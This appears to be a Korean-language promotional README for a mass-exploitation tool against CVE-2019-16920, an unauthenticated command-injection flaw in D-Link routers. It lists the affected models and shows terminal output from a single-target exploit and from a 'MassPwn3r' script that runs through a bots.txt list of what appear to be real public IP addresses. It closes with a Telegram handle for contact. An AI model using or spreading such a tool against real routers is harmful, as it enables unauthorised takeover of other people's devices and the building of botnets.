
여러 D-Link 라우터의 CVE-2019-16920 명령 주입 취약점을 대상으로 하는 자동화된 대량 악용 도구로, 인증되지 않은 원격 코드 실행을 가능하게 합니다.
다음 D-Link 제품의 최신 펌웨어에서 취약점이 발견되었습니다: DIR-655 DIR-866L DIR-652 DHP-1565
D-Link 제품(DIR-655C, DIR-866L, DIR-652, DHP-1565 등)에서 인증되지 않은 원격 코드 실행이 발생합니다. 이 문제는 공격자가 'PingTest' 장치 공통 게이트웨이 인터페이스에 임의 입력을 전송하여 일반적인 인젝션을 유발할 때 발생합니다. 명령 인젝션을 성공적으로 트리거한 공격자는 전체 시스템을 장악할 수 있습니다. 이후 독립적으로 다음 제품들도 영향을 받는 것으로 확인되었습니다: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, DIR-825.
root@kali:~# python3 CVE-2019-16920.py 195.208.166.41 8081 ls
[*]Sending payload
[*]Exploited!
root@kali:~#
root@kali:~# python3 CVE-2019-16920-MassPwn3r.py bots.txt 8081 id
[*]Exploiting: 195.208.166.41
[!]Unable to connect to host
[!]Unable to connect to host
[*]Exploiting: 83.243.166.37
[*]Exploiting: 74.95.133.33
[*]Exploiting: 97.89.64.118
[*]Exploiting: 66.162.68.154
[!]Unable to connect to host
[*]Exploiting: 72.47.152.161
[*]Exploiting: 97.93.250.209
[*]Exploiting: 183.207.196.64
root@kali:~#
Telegram:@eth_hacker0x18